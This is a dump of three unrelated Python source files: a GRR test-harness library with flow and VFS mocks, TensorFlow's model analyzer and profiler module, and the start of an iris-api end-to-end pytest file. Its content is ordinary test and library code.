if hasattr(self, message.name):
return getattr(self, message.name)(message.payload)
action_cls = self.action_classes[message.name]
action = action_cls(message=message, grr_worker=client_worker)
action.Execute()
self.action_counts[message.name] += 1
return client_worker.responses
class InvalidActionMock(object):
"""An action mock which raises for all actions."""
def HandleMessage(self, unused_message):
raise RuntimeError("Invalid Action Mock.")
class Test(actions.ActionPlugin):
"""A test action which can be used in mocks."""
in_rdfvalue = rdfvalue.DataBlob
out_rdfvalue = rdfvalue.DataBlob
def CheckFlowErrors(total_flows, token=None):
# Check that all the flows are complete.
for session_id in total_flows:
try:
flow_obj = aff4.FACTORY.Open(session_id, aff4_type="GRRFlow", mode="r",
token=token)
except IOError:
continue
if flow_obj.state.context.state != rdfvalue.Flow.State.TERMINATED:
if flags.FLAGS.debug:
pdb.set_trace()
raise RuntimeError("Flow %s completed in state %s" % (
flow_obj.state.context.args.flow_name,
flow_obj.state.context.state))
def TestFlowHelper(flow_urn_or_cls_name, client_mock=None, client_id=None,
check_flow_errors=True, token=None, notification_event=None,
sync=True, **kwargs):
"""Build a full test harness: client - worker + start flow.
Args:
flow_urn_or_cls_name: RDFURN pointing to existing flow (in this case the
given flow will be run) or flow class name (in this
case flow of the given class will be created and run).
client_mock: Client mock object.
client_id: Client id of an emulated client.
check_flow_errors: If True, TestFlowHelper will raise on errors during flow
execution.
token: Security token.
notification_event: A well known flow session_id of an event listener. Event
will be published once the flow finishes.
sync: Whether StartFlow call should be synchronous or not.
**kwargs: Arbitrary args that will be passed to flow.GRRFlow.StartFlow().
Yields:
The caller should iterate over the generator to get all the flows
and subflows executed.
"""
if client_id or client_mock:
client_mock = MockClient(client_id, client_mock, token=token)
worker_mock = MockWorker(check_flow_errors=check_flow_errors, token=token)
if isinstance(flow_urn_or_cls_name, rdfvalue.RDFURN):
session_id = flow_urn_or_cls_name
else:
# Instantiate the flow:
session_id = flow.GRRFlow.StartFlow(
client_id=client_id, flow_name=flow_urn_or_cls_name,
notification_event=notification_event, sync=sync,
token=token, **kwargs)
total_flows = set()
total_flows.add(session_id)
# Run the client and worker until nothing changes any more.
while True:
if client_mock:
client_processed = client_mock.Next()
else:
client_processed = 0
flows_run = []
for flow_run in worker_mock.Next():
total_flows.add(flow_run)
flows_run.append(flow_run)
if client_processed == 0 and not flows_run:
break
yield session_id
# We should check for flow errors:
if check_flow_errors:
CheckFlowErrors(total_flows, token=token)
class CrashClientMock(object):
def __init__(self, client_id, token):
self.client_id = client_id
self.token = token
def HandleMessage(self, message):
status = rdfvalue.GrrStatus(
status=rdfvalue.GrrStatus.ReturnedStatus.CLIENT_KILLED,
error_message="Client killed during transaction")
msg = rdfvalue.GrrMessage(
request_id=message.request_id, response_id=1,
session_id=message.session_id,
type=rdfvalue.GrrMessage.Type.STATUS,
payload=status,
auth_state=rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED)
msg.SetWireFormat("source", utils.SmartStr(self.client_id.Basename()))
self.flow_id = message.session_id
# This is normally done by the FrontEnd when a CLIENT_KILLED message is
# received.
flow.Events.PublishEvent("ClientCrash", msg, token=self.token)
return [status]
class MemoryClientMock(ActionMock):
"""A mock of client state including memory actions."""
def InstallDriver(self, _):
return []
def UninstallDriver(self, _):
return []
def GetMemoryInformation(self, _):
reply = rdfvalue.MemoryInformation(
device=rdfvalue.PathSpec(
path=r"\\.\pmem",
pathtype=rdfvalue.PathSpec.PathType.MEMORY))
reply.runs.Append(offset=0x1000, length=0x10000)
reply.runs.Append(offset=0x20000, length=0x10000)
return [reply]
class SampleHuntMock(object):
def __init__(self, failrate=2, data="Hello World!"):
self.responses = 0
self.data = data
self.failrate = failrate
self.count = 0
def StatFile(self, args):
return self._StatFile(args)
def _StatFile(self, args):
req = rdfvalue.ListDirRequest(args)
response = rdfvalue.StatEntry(
pathspec=req.pathspec,
st_mode=33184,
st_ino=1063090,
st_dev=64512L,
st_nlink=1,
st_uid=139592,
st_gid=5000,
st_size=len(self.data),
st_atime=1336469177,
st_mtime=1336129892,
st_ctime=1336129892)
self.responses += 1
self.count += 1
# Create status message to report sample resource usage
status = rdfvalue.GrrStatus(status=rdfvalue.GrrStatus.ReturnedStatus.OK)
status.cpu_time_used.user_cpu_time = self.responses
status.cpu_time_used.system_cpu_time = self.responses * 2
status.network_bytes_sent = self.responses * 3
# Every "failrate" client does not have this file.
if self.count == self.failrate:
self.count = 0
return [status]
return [response, status]
def TransferBuffer(self, args):
response = rdfvalue.BufferReference(args)
offset = min(args.offset, len(self.data))
response.data = self.data[offset:]
response.length = len(self.data[offset:])
return [response]
def TestHuntHelperWithMultipleMocks(client_mocks, check_flow_errors=False,
token=None):
total_flows = set()
client_mocks = [MockClient(client_id, client_mock, token=token)
for client_id, client_mock in client_mocks.iteritems()]
worker_mock = MockWorker(check_flow_errors=check_flow_errors, token=token)
# Run the clients and worker until nothing changes any more.
while True:
client_processed = 0
for client_mock in client_mocks:
client_processed += client_mock.Next()
flows_run = []
for flow_run in worker_mock.Next():
total_flows.add(flow_run)
flows_run.append(flow_run)
if client_processed == 0 and not flows_run:
break
if check_flow_errors:
CheckFlowErrors(total_flows, token=token)
def TestHuntHelper(client_mock, client_ids, check_flow_errors=False,
token=None):
return TestHuntHelperWithMultipleMocks(
dict([(client_id, client_mock) for client_id in client_ids]),
check_flow_errors=check_flow_errors, token=token)
# Default fixture age is (Mon Mar 26 14:07:13 2012).
FIXTURE_TIME = 1332788833
def FilterFixture(fixture=None, regex="."):
"""Returns a sub fixture by only returning objects which match the regex."""
result = []
regex = re.compile(regex)
if fixture is None:
fixture = client_fixture.VFS
for path, attributes in fixture:
if regex.match(path):
result.append((path, attributes))
return result
def SetLabel(*labels):
"""Sets a label on a function so we can run tests with different types."""
def Decorator(f):
# If the method is not already tagged, we replace its label (the default
# label is "small").
function_labels = getattr(f, "labels", set())
f.labels = function_labels.union(set(labels))
return f
return Decorator
class ClientFixture(object):
"""A tool to create a client fixture.
This will populate the AFF4 object tree in the data store with a mock client
filesystem, including various objects. This allows us to test various
end-to-end aspects (e.g. GUI).
"""
def __init__(self, client_id, token=None, fixture=None, age=None,
**kwargs):
"""Constructor.
Args:
client_id: The unique id for the new client.
token: An instance of access_control.ACLToken security token.
fixture: An optional fixture to install. If not provided we use
client_fixture.VFS.
age: Create the fixture at this timestamp. If None we use FIXTURE_TIME.
**kwargs: Any other parameters which need to be interpolated by the
fixture.
"""
self.args = kwargs
self.token = token
self.age = age or FIXTURE_TIME
self.client_id = rdfvalue.ClientURN(client_id)
self.args["client_id"] = self.client_id.Basename()
self.args["age"] = self.age
self.CreateClientObject(fixture or client_fixture.VFS)
def CreateClientObject(self, vfs_fixture):
"""Make a new client object."""
# Create the fixture at a fixed time.
with Stubber(time, "time", lambda: self.age):
for path, (aff4_type, attributes) in vfs_fixture:
path %= self.args
# First remove the old fixture just in case its still there.
data_store.DB.DeleteAttributesRegex(
self.client_id.Add(path), aff4.AFF4_PREFIXES, token=self.token)
aff4_object = aff4.FACTORY.Create(self.client_id.Add(path),
aff4_type, mode="rw",
token=self.token)
for attribute_name, value in attributes.items():
attribute = aff4.Attribute.PREDICATES[attribute_name]
if isinstance(value, (str, unicode)):
# Interpolate the value
value %= self.args
# Is this supposed to be an RDFValue array?
if aff4.issubclass(attribute.attribute_type, rdfvalue.RDFValueArray):
rdfvalue_object = attribute()
for item in value:
new_object = rdfvalue_object.rdf_type.FromTextFormat(
utils.SmartStr(item))
rdfvalue_object.Append(new_object)
# It is a text serialized protobuf.
elif aff4.issubclass(attribute.attribute_type,
rdfvalue.RDFProtoStruct):
# Use the alternate constructor - we always write protobufs in
# textual form:
rdfvalue_object = attribute.attribute_type.FromTextFormat(
utils.SmartStr(value))
else:
rdfvalue_object = attribute(value)
aff4_object.AddAttribute(attribute, rdfvalue_object)
# Make sure we do not actually close the object here - we only want to
# sync back its attributes, not run any finalization code.
aff4_object.Flush()
class ClientVFSHandlerFixture(vfs.VFSHandler):
"""A client side VFS handler for the OS type - returns the fixture."""
# A class wide cache for fixtures. Key is the prefix, and value is the
# compiled fixture.
cache = {}
paths = None
supported_pathtype = rdfvalue.PathSpec.PathType.OS
# Do not auto-register.
auto_register = False
# Everything below this prefix is emulated
prefix = "/fs/os"
def __init__(self, base_fd, prefix=None, pathspec=None):
super(ClientVFSHandlerFixture, self).__init__(base_fd, pathspec=pathspec)
self.prefix = self.prefix or prefix
self.pathspec.Append(pathspec)
self.path = self.pathspec.CollapsePath()
self.paths = self.cache.get(self.prefix)
self.PopulateCache()
def PopulateCache(self):
"""Parse the paths from the fixture."""
if self.paths: return
# The cache is attached to the class so it can be shared by all instance.
self.paths = self.__class__.cache[self.prefix] = {}
for path, (vfs_type, attributes) in client_fixture.VFS:
if not path.startswith(self.prefix): continue
path = utils.NormalizePath(path[len(self.prefix):])
if path == "/":
continue
stat = rdfvalue.StatEntry()
args = {"client_id": "C.1234"}
attrs = attributes.get("aff4:stat")
if attrs:
attrs %= args # Remove any %% and interpolate client_id.
stat = rdfvalue.StatEntry.FromTextFormat(utils.SmartStr(attrs))
stat.pathspec = rdfvalue.PathSpec(pathtype=self.supported_pathtype,
path=path)
# TODO(user): Once we add tests around not crossing device boundaries,
# we need to be smarter here, especially for the root entry.
stat.st_dev = 1
path = self._NormalizeCaseForPath(path, vfs_type)
self.paths[path] = (vfs_type, stat)
self.BuildIntermediateDirectories()
def _NormalizeCaseForPath(self, path, vfs_type):
"""Handle casing differences for different filesystems."""
# Special handling for case sensitivity of registry keys.
# This mimicks the behavior of the operating system.
if self.supported_pathtype == rdfvalue.PathSpec.PathType.REGISTRY:
self.path = self.path.replace("\\", "/")
parts = path.split("/")
if vfs_type == "VFSFile":
# If its a file, the last component is a value which is case sensitive.
lower_parts = [x.lower() for x in parts[0:-1]]
lower_parts.append(parts[-1])
path = utils.Join(*lower_parts)
else:
path = utils.Join(*[x.lower() for x in parts])
return path
def BuildIntermediateDirectories(self):
"""Interpolate intermediate directories based on their children.
This avoids us having to put in useless intermediate directories to the
client fixture.
"""
for dirname, (_, stat) in self.paths.items():
while 1:
dirname = os.path.dirname(dirname)
new_pathspec = stat.pathspec.Copy()
new_pathspec.path = dirname
if dirname == "/" or dirname in self.paths: break
self.paths[dirname] = ("VFSDirectory",
rdfvalue.StatEntry(st_mode=16877,
st_size=1,
st_dev=1,
pathspec=new_pathspec))
def ListFiles(self):
# First return exact matches
for k, (_, stat) in self.paths.items():
dirname = os.path.dirname(k)
if dirname == self._NormalizeCaseForPath(self.path, None):
yield stat
def Read(self, length):
result = self.paths.get(self.path)
if not result:
raise IOError("File not found")
result = result[1] # We just want the stat.
data = ""
if result.HasField("resident"):
data = result.resident
elif result.HasField("registry_type"):
data = utils.SmartStr(result.registry_data.GetValue())
data = data[self.offset:self.offset + length]
self.offset += len(data)
return data
def ListNames(self):
for stat in self.ListFiles():
yield os.path.basename(stat.pathspec.path)
def IsDirectory(self):
return bool(self.ListFiles())
def Stat(self):
"""Get Stat for self.path."""
stat_data = self.paths.get(self._NormalizeCaseForPath(self.path, None))
if (not stat_data and
self.supported_pathtype == rdfvalue.PathSpec.PathType.REGISTRY):
# Check in case it is a registry value. Unfortunately our API doesn't let
# the user specify if they are after a value or a key, so we have to try
# both.
stat_data = self.paths.get(self._NormalizeCaseForPath(self.path,
"VFSFile"))
if stat_data:
return stat_data[1] # Strip the vfs_type.
else:
# We return some fake data, this makes writing tests easier for some
# things but we give an error to the tester as it is often not what you
# want.
logging.warn("Fake value for %s under %s", self.path, self.prefix)
return rdfvalue.StatEntry(pathspec=self.pathspec,
st_mode=16877,
st_size=12288,
st_atime=1319796280,
st_dev=1)
class ClientRegistryVFSFixture(ClientVFSHandlerFixture):
"""Special client VFS mock that will emulate the registry."""
prefix = "/registry"
supported_pathtype = rdfvalue.PathSpec.PathType.REGISTRY
class ClientFullVFSFixture(ClientVFSHandlerFixture):
"""Full client VFS mock."""
prefix = "/"
supported_pathtype = rdfvalue.PathSpec.PathType.OS
class GrrTestProgram(unittest.TestProgram):
"""A Unit test program which is compatible with conf based args parsing."""
def __init__(self, labels=None, **kw):
self.labels = labels
# Recreate a new data store each time.
startup.TestInit()
self.setUp()
try:
super(GrrTestProgram, self).__init__(**kw)
finally:
try:
self.tearDown()
except Exception as e: # pylint: disable=broad-except
logging.exception(e)
def setUp(self):
"""Any global initialization goes here."""
def tearDown(self):
"""Global teardown code goes here."""
def parseArgs(self, argv):
"""Delegate arg parsing to the conf subsystem."""
# Give the same behaviour as regular unittest
if not flags.FLAGS.tests:
self.test = self.testLoader.loadTestsFromModule(self.module)
return
self.testNames = flags.FLAGS.tests
self.createTests()
class RemotePDB(pdb.Pdb):
"""A Remote debugger facility.
Place breakpoints in the code using:
test_lib.RemotePDB().set_trace()
Once the debugger is attached all remote break points will use the same
connection.
"""
handle = None
prompt = "RemotePDB>"
def __init__(self):
# Use a global socket for remote debugging.
if RemotePDB.handle is None:
self.ListenForConnection()
pdb.Pdb.__init__(self, stdin=self.handle,
stdout=codecs.getwriter("utf8")(self.handle))
def ListenForConnection(self):
"""Listens and accepts a single connection."""
logging.warn("Remote debugger waiting for connection on %s",
config_lib.CONFIG["Test.remote_pdb_port"])
RemotePDB.old_stdout = sys.stdout
RemotePDB.old_stdin = sys.stdin
RemotePDB.skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
RemotePDB.skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
RemotePDB.skt.bind(("127.0.0.1", config_lib.CONFIG["Test.remote_pdb_port"]))
RemotePDB.skt.listen(1)
(clientsocket, address) = RemotePDB.skt.accept()
RemotePDB.handle = clientsocket.makefile("rw", 1)
logging.warn("Received a connection from %s", address)
def main(argv=None):
if argv is None:
argv = sys.argv
print "Running test %s" % argv[0]
GrrTestProgram(argv=argv)
| apache-2.0 | -9,088,753,942,586,523,000 | 30.934976 | 82 | 0.647488 | false |
renyi533/tensorflow | tensorflow/python/profiler/model_analyzer.py | 8 | 15063 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model Analyzer.
Analyze model, including shape, params, time, memory, structure, etc.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import six
from google.protobuf import message
from tensorflow.core.profiler import tfprof_options_pb2
from tensorflow.core.profiler import tfprof_output_pb2
from tensorflow.python import _pywrap_tfprof as print_mdl
from tensorflow.python.eager import context
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.profiler import option_builder
from tensorflow.python.profiler import tfprof_logger
from tensorflow.python.util.tf_export import tf_export
_DEFAULT_PROFILE_OPTIONS = 0
_DEFAULT_ADVISE_OPTIONS = 0
# The following options are for 'advise' cmd.
# Show all advice.
ALL_ADVICE = {
'ExpensiveOperationChecker': {},
'AcceleratorUtilizationChecker': {},
'JobChecker': {}, # Only available internally.
'OperationChecker': {},
}
def _graph_string(graph):
"""Helper to serialize a graph to string."""
if graph:
return graph.as_graph_def(add_shapes=True).SerializeToString()
else:
return b''
def _build_options(options):
"""Build tfprof.OptionsProto.
Args:
options: A dictionary of options.
Returns:
tfprof.OptionsProto.
"""
opts = tfprof_options_pb2.OptionsProto()
opts.max_depth = options.get('max_depth', 10)
opts.min_bytes = options.get('min_bytes', 0)
opts.min_peak_bytes = options.get('min_peak_bytes', 0)
opts.min_residual_bytes = options.get('min_residual_bytes', 0)
opts.min_output_bytes = options.get('min_output_bytes', 0)
opts.min_micros = options.get('min_micros', 0)
opts.min_accelerator_micros = options.get('min_accelerator_micros', 0)
opts.min_cpu_micros = options.get('min_cpu_micros', 0)
opts.min_params = options.get('min_params', 0)
opts.min_float_ops = options.get('min_float_ops', 0)
opts.min_occurrence = options.get('min_occurrence', 0)
opts.step = options.get('step', -1)
opts.order_by = options.get('order_by', 'name')
for p in options.get('account_type_regexes', []):
opts.account_type_regexes.append(p)
for p in options.get('start_name_regexes', []):
opts.start_name_regexes.append(p)
for p in options.get('trim_name_regexes', []):
opts.trim_name_regexes.append(p)
for p in options.get('show_name_regexes', []):
opts.show_name_regexes.append(p)
for p in options.get('hide_name_regexes', []):
opts.hide_name_regexes.append(p)
opts.account_displayed_op_only = options.get('account_displayed_op_only',
False)
for p in options.get('select', []):
opts.select.append(p)
opts.output = options.get('output', 'stdout')
opts.dump_to_file = options.get('dump_to_file', '')
return opts
def _build_advisor_options(options):
"""Build tfprof.AdvisorOptionsProto.
Args:
options: A dictionary of options. See ALL_ADVICE example.
Returns:
tfprof.AdvisorOptionsProto.
"""
opts = tfprof_options_pb2.AdvisorOptionsProto()
if options is None:
return opts
for checker, checker_opts in six.iteritems(options):
checker_ops_pb = tfprof_options_pb2.AdvisorOptionsProto.CheckerOption()
for k, v in six.iteritems(checker_opts):
checker_ops_pb[k] = v
opts.checkers[checker].MergeFrom(checker_ops_pb)
return opts
@tf_export(v1=['profiler.Profiler'])
class Profiler(object):
"""TensorFlow multi-step profiler.
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
```python
Typical use case:
# Currently we are only allowed to create 1 profiler per process.
profiler = Profiler(sess.graph)
for i in xrange(total_steps):
if i % 10000 == 0:
run_meta = tf.compat.v1.RunMetadata()
_ = sess.run(...,
options=tf.compat.v1.RunOptions(
trace_level=tf.RunOptions.FULL_TRACE),
run_metadata=run_meta)
profiler.add_step(i, run_meta)
# Profile the parameters of your model.
profiler.profile_name_scope(options=(option_builder.ProfileOptionBuilder
.trainable_variables_parameter()))
# Or profile the timing of your model operations.
opts = option_builder.ProfileOptionBuilder.time_and_memory()
profiler.profile_operations(options=opts)
# Or you can generate a timeline:
opts = (option_builder.ProfileOptionBuilder(
option_builder.ProfileOptionBuilder.time_and_memory())
.with_step(i)
.with_timeline_output(filename).build())
profiler.profile_graph(options=opts)
else:
_ = sess.run(...)
# Auto detect problems and generate advice.
profiler.advise()
```
"""
def __init__(self, graph=None, op_log=None):
"""Constructor.
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
op_log: optional. tensorflow::tfprof::OpLogProto proto. Used to define
extra op types.
"""
if not graph and not context.executing_eagerly():
graph = ops.get_default_graph()
self._coverage = 0.0
self._graph = graph
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
self._graph, op_log=op_log)
# pylint: enable=protected-access
print_mdl.NewProfiler(
_graph_string(self._graph), op_log.SerializeToString())
def __del__(self):
print_mdl.DeleteProfiler()
def add_step(self, step, run_meta):
"""Add statistics of a step.
Args:
step: int, An id used to group one or more different `run_meta` together.
When profiling with the profile_xxx APIs, user can use the `step`
id in the `options` to profile these `run_meta` together.
run_meta: RunMetadata proto that contains statistics of a session run.
"""
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
self._graph, run_meta=run_meta)
# pylint: enable=protected-access
# TODO(xpan): P1: Better to find the current graph.
self._coverage = print_mdl.AddStep(step, _graph_string(self._graph),
run_meta.SerializeToString(),
op_log.SerializeToString())
def profile_python(self, options):
"""Profile the statistics of the Python codes.
By default, it shows the call stack from root. To avoid
redundant output, you may use options to filter as below
options['show_name_regexes'] = ['.*my_code.py.*']
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a MultiGraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('code'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_operations(self, options):
"""Profile the statistics of the Operation types (e.g. MatMul, Conv2D).
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a MultiGraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('op'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_name_scope(self, options):
"""Profile the statistics of graph nodes, organized by name scope.
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a GraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.GraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('scope'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_graph(self, options):
"""Profile the statistics of graph nodes, organized by dataflow graph.
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a GraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.GraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('graph'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def advise(self, options):
"""Automatically detect problems and generate reports.
Args:
options: A dict of options. See ALL_ADVICE example above.
Returns:
An Advise proto that contains the reports from all checkers.
"""
advise_pb = tfprof_output_pb2.AdviceProto()
opts = _build_advisor_options(options)
advise_pb.ParseFromString(
print_mdl.Profile('advise'.encode('utf-8'), opts.SerializeToString()))
return advise_pb
def serialize_to_string(self):
"""Serialize the ProfileProto to a binary string.
Users can write it to file for offline analysis by tfprof commandline
or graphical interface.
Returns:
ProfileProto binary string.
"""
return print_mdl.SerializeToString()
def _write_profile(self, filename):
"""Writes the profile to a file."""
print_mdl.WriteProfile(filename)
@tf_export(v1=['profiler.profile'])
def profile(graph=None,
run_meta=None,
op_log=None,
cmd='scope',
options=_DEFAULT_PROFILE_OPTIONS):
"""Profile model.
Tutorials and examples can be found in:
https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/profiler/g3doc/python_api.md
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
run_meta: optional tensorflow.RunMetadata proto. It is necessary to
to support run time information profiling, such as time and memory.
op_log: tensorflow.tfprof.OpLogProto proto. User can assign "types" to
graph nodes with op_log. "types" allow user to flexibly group and
account profiles using options['accounted_type_regexes'].
cmd: string. Either 'op', 'scope', 'graph' or 'code'.
'op' view organizes profile using operation type. (e.g. MatMul)
'scope' view organizes profile using graph node name scope.
'graph' view organizes profile using graph node inputs/outputs.
'code' view organizes profile using Python call stack.
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
If cmd is 'scope' or 'graph', returns GraphNodeProto proto.
If cmd is 'op' or 'code', returns MultiGraphNodeProto proto.
Side effect: stdout/file/timeline.json depending on options['output']
"""
if not graph and not context.executing_eagerly():
graph = ops.get_default_graph()
if options == _DEFAULT_PROFILE_OPTIONS:
options = (option_builder.ProfileOptionBuilder
.trainable_variables_parameter())
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
graph, op_log, run_meta, add_trace=cmd == 'code')
# pylint: enable=protected-access
opts = _build_options(options)
run_meta_str = run_meta.SerializeToString() if run_meta else b''
graph_str = _graph_string(graph)
if cmd == 'code' or cmd == 'op':
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
ret = print_mdl.PrintModelAnalysis(graph_str, run_meta_str,
op_log.SerializeToString(),
cmd.encode('utf-8'),
opts.SerializeToString())
try:
tfprof_node.ParseFromString(ret)
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
elif cmd == 'graph' or cmd == 'scope':
tfprof_node = tfprof_output_pb2.GraphNodeProto()
ret = print_mdl.PrintModelAnalysis(graph_str, run_meta_str,
op_log.SerializeToString(),
cmd.encode('utf-8'),
opts.SerializeToString())
try:
tfprof_node.ParseFromString(ret)
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
else:
raise errors.InvalidArgumentError(
None, None, 'unknown cmd: %s\n' % cmd)
return tfprof_node
@tf_export(v1=['profiler.advise'])
def advise(graph=None, run_meta=None, options=_DEFAULT_ADVISE_OPTIONS):
"""Auto profile and advise.
Builds profiles and automatically check anomalies of various
aspects. For more details:
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
run_meta: optional tensorflow.RunMetadata proto. It is necessary to
to support run time information profiling, such as time and memory.
options: see ALL_ADVICE example above. Default checks everything.
Returns:
Returns AdviceProto proto
"""
if not graph and not context.executing_eagerly():
graph = ops.get_default_graph()
if options == _DEFAULT_ADVISE_OPTIONS:
options = ALL_ADVICE.copy()
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
graph, None, run_meta, add_trace=True)
# pylint: enable=protected-access
run_meta_str = run_meta.SerializeToString() if run_meta else b''
opts = _build_advisor_options(options)
ret = tfprof_output_pb2.AdviceProto()
ret.ParseFromString(
print_mdl.PrintModelAnalysis(
_graph_string(graph), run_meta_str, op_log.SerializeToString(),
'advise'.encode('utf-8'), opts.SerializeToString()))
return ret
| apache-2.0 | 1,639,094,313,660,654,300 | 34.864286 | 101 | 0.666069 | false |
houqp/iris-api | test/e2etest.py | 1 | 90181 | #!/usr/bin/env python
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
# -*- coding:utf-8 -*-
import pytest
import json
import requests
import copy
import iris.bin.iris_ctl as iris_ctl
from click.testing import CliRunner
import uuid
import socket
server = 'http://localhost:16649/'
sender_address = ('localhost', 2321)
base_url = server + 'v0/'
ui_url = server
sample_db_config = {
'db': {
'conn': {
'str': "%(scheme)s://%(user)s:%(password)s@%(host)s/%(database)s?charset=%(charset)s",
'kwargs': {
'scheme': 'mysql+pymysql',
'user': 'root',
'password': '',
'host': '127.0.0.1',
'database': 'iris',
'charset': 'utf8'}},
'kwargs': {
'pool_recycle': 3600,
'echo': False,
'pool_size': 100,
'max_overflow': 100,
'pool_timeout': 60
}}}
def username_header(username):
return {'X-IRIS-USERNAME': username}
@pytest.fixture(scope='module')
def iris_messages():
'''List of iris messages'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `id`, `incident_id` FROM `message` WHERE NOT ISNULL(`incident_id`) ORDER BY `id` DESC LIMIT 3')
return [dict(id=id, incident_id=incident_id) for (id, incident_id) in cursor]
@pytest.fixture(scope='module')
def iris_incidents():
'''List of iris incidents'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `id` FROM `incident` LIMIT 3')
return [dict(id=id) for (id,) in cursor]
@pytest.fixture(scope='module')
def fake_message_id(iris_messages):
'''A sample message ID'''
if iris_messages:
return iris_messages[0]['id']
@pytest.fixture(scope='module')
def fake_batch_id():
'''A sample message batch ID'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `batch` FROM `message` WHERE NOT ISNULL(`incident_id`) AND NOT ISNULL(`batch`) LIMIT 1')
result = cursor.fetchall()
if not result:
return None
return result[0][0]
@pytest.fixture(scope='module')
def fake_incident_id(iris_messages):
'''ID of incident corresponding to fake_message_id'''
if iris_messages:
return iris_messages[0]['incident_id']
@pytest.fixture(scope='module')
def iris_users():
'''List of all iris users'''
re = requests.get(base_url + 'targets/user')
assert re.status_code == 200
return re.json()
@pytest.fixture(scope='module')
def iris_teams():
'''List of all iris teams'''
re = requests.get(base_url + 'targets/team')
assert re.status_code == 200
return re.json()
@pytest.fixture(scope='module')
def iris_applications():
'''List of all iris applications' metadata'''
re = requests.get(base_url + 'applications')
assert re.status_code == 200
return re.json()
@pytest.fixture(scope='module')
def sample_user(iris_users):
'''First user in our list of iris users whose length is long enough for filtering'''
for user in iris_users:
if len(user) > 2:
return user
@pytest.fixture(scope='module')
def sample_user2(sample_user, iris_users):
'''First user in our list of iris users whose length is long enough for filtering and does not start similarly to sample_user'''
for user in iris_users:
if user != sample_user and len(user) > 2 and not sample_user.startswith(user[:2]):
return user
@pytest.fixture(scope='module')
def sample_admin_user():
'''List of iris messages'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `name` FROM `target` JOIN `user` on `target`.`id` = `user`.`target_id` WHERE `user`.`admin` = TRUE LIMIT 1')
result = cursor.fetchone()
if result:
return result[0]
@pytest.fixture(scope='module')
def sample_team(iris_teams):
'''First team in our list of iris teams whose length is long enough for filtering'''
for team in iris_teams:
if len(team) > 2:
return team
@pytest.fixture(scope='module')
def sample_team2(sample_team, iris_teams):
'''First team in our list of iris teams whose length is long enough for filtering and does not start similarly to sample_team'''
for team in iris_teams:
if team != sample_team and len(team) > 2 and not sample_team.startswith(team[:2]):
return team
@pytest.fixture(scope='module')
def sample_email(sample_user):
'''Email address of sample_user'''
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user))
assert re.status_code == 200
data = re.json()
return data['contacts']['email']
@pytest.fixture(scope='module')
def sample_phone(sample_user):
'''Email address of sample_user'''
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user))
assert re.status_code == 200
data = re.json()
return data['contacts']['call']
@pytest.fixture(scope='module')
def superuser_application():
'''application which should have 'allow_other_app_incidents' in DB set to 1, allowing it to create incidents as other applications.
should generally be 'iris-frontend' '''
return 'iris-frontend'
@pytest.fixture(scope='module')
def sample_application_name(iris_applications, superuser_application):
'''Name of an application which is not the superuser_application'''
for application in iris_applications:
